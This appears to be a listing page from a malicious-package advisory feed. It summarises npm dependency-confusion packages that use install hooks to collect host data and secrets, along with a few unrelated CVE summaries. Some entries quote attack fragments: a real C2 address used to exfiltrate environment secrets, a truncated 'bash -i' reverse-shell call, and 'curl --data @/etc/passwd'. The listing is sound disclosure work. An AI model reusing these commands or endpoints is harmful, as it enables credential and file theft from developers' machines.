Malicious code in surf-lending (npm)

Sibling of [email protected] campaign C2 path /surflending/. Sentinel-9.9.9 dep-confusion squat; preinstall node index.js || true exfils env secrets mnemonic/key/token/blockfrost to raw C2 2.25.140.71:8443/surflending/npm-confusion. c913 + c252. --- -= Per source details. Do not edit below this...

MAL-2026-5784 Malicious code in vaults-monitor-cron (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b81c6b9e59e86c40858cb47e91d597b3776fea71def7feb3ca11833625fa3923 On npm install, the package's preinstall hook node postinstall.js || true executes automatically. The script collects hostname, username, and current...

MAL-2026-5613 Malicious code in internallib_v346 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 16f3f2c0990e02417fdf7012e6531393e81f786bb16019d0efdb03c049817f90 Package name targets an internal-only namespace and ships a reverse-shell payload. index.js line 5 unconditionally invokes exec'/bin/bash -c "bash -i...

Malicious code in @orion-design-system/components (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector edd5d007da2de0a07fc1a0d999cccbf71a748627c82c9b2000d161eb248a5a0f package.json declares a preinstall hook that runs an inline node -e script reading os.hostname and os.userInfo.username and transmitting them via HTT...

MAL-2026-5522 Malicious code in @orion-design-system/components (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector edd5d007da2de0a07fc1a0d999cccbf71a748627c82c9b2000d161eb248a5a0f package.json declares a preinstall hook that runs an inline node -e script reading os.hostname and os.userInfo.username and transmitting them via HTT...

MAL-2026-5429 Malicious code in @shell-landing/routes (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6db5f32788db0c0eefee1ec8520b56ef908f8909cd79d5fdb16c2595c65f1577 On npm install, the package's postinstall hook runs node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd'...

MAL-2026-5452 Malicious code in shopify-app-bridge-internal (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b21c63417fe3a82fd514d0af7c913fb3c1cd62915839dc8910483fb6484bbbd9 The package's preinstall lifecycle script in package.json runs unconditionally on npm install and issues an HTTPS GET to...

Malicious code in @telenor-se/core (npm)

Dependency confusion attack campaign targeting Scandinavian telecommunications and digital services organizations Telenor, Ownit, Vimla, and Customer 360 / C360. Four packages published by the debating0166 npm account use inflated version numbers 99.0.x to win npm registry resolution over private...

Malicious code in @tse-digital/core (npm)

Dependency confusion attack campaign targeting Scandinavian telecommunications and digital services organizations Telenor, Ownit, Vimla, and Customer 360 / C360. Four packages published by the debating0166 npm account use inflated version numbers 99.0.x to win npm registry resolution over private...

MAL-2026-5155 Malicious code in @ownit/core (npm)

Dependency confusion attack campaign targeting Scandinavian telecommunications and digital services organizations Telenor, Ownit, Vimla, and Customer 360 / C360. Four packages published by the debating0166 npm account use inflated version numbers 99.0.x to win npm registry resolution over private...

MAL-2026-5154 Malicious code in @customer-threesixty/assets (npm)

Dependency confusion attack campaign targeting Scandinavian telecommunications and digital services organizations Telenor, Ownit, Vimla, and Customer 360 / C360. Four packages published by the debating0166 npm account use inflated version numbers 99.0.x to win npm registry resolution over private...

Malicious code in ignite-market-contractstest (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b9babd9b088785649368dbf885050b6a15b218a6b38d2dcd058f0c9eda5109da package.json declares a preinstall lifecycle hook that runs wget --quiet...

MAL-2026-4583 Malicious code in ignite-market-contractstest (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b9babd9b088785649368dbf885050b6a15b218a6b38d2dcd058f0c9eda5109da package.json declares a preinstall lifecycle hook that runs wget --quiet...

Malicious code in @sec-loans-ui/utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector da55a9be9d9f90abe00e16200ea17aa78f58643e40d872d04276453dfd8a88f9 Package is a hollow lure: index.js is a 35-byte stub module.exports = , description and author are empty, and the version is bumped to 99.9.1 — the...

Malicious code in @flipbit2-bb/test-auth-state (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 52ba26e89d1aca1f10772bf4cc8c9b23a436a39a8442fdf4ba9abf6c4c890e63 On npm install, a postinstall script phone-home.js collects os.hostname, os.userInfo.username, process.platform + os.release, a timestamp, and a...

Malicious Package

Overview blz-internal-pkgupdate is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this packag...

Unity Linux 20.1060e / 20.1070e Security Update: kernel (UTSA-2025-992214)

The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2025-992214 advisory. In the Linux kernel, the following vulnerability has been resolved: ACPICA: Fix use-after-free in acpiutcopyipackagetoipackage There is an use-after-free reported by...

Use of a Broken or Risky Cryptographic Algorithm

Overview Affected versions of this package are vulnerable to Use of a Broken or Risky Cryptographic Algorithm when storing encrypted data keys in an instruction file. An attacker with write access to the S3 bucket can manipulate encrypted data keys to cause decryption to unintended plaintext by...

Relative Path Traversal

Overview Affected versions of this package are vulnerable to Relative Path Traversal due to unsafe path handling. An attacker can access, overwrite, or delete files outside the intended directories by supplying specially crafted names or archive entries containing path traversal sequences...

Jellysweep uses uncontrolled data in image cache API endpoint

Impact The /api/images/cache which is used to download media posters from the server accepted an url parameter, which was directly passed to the cache package and that downloaded the poster from this URL. This URL parameter can be used to make the jellysweep server download arbitrary content. The...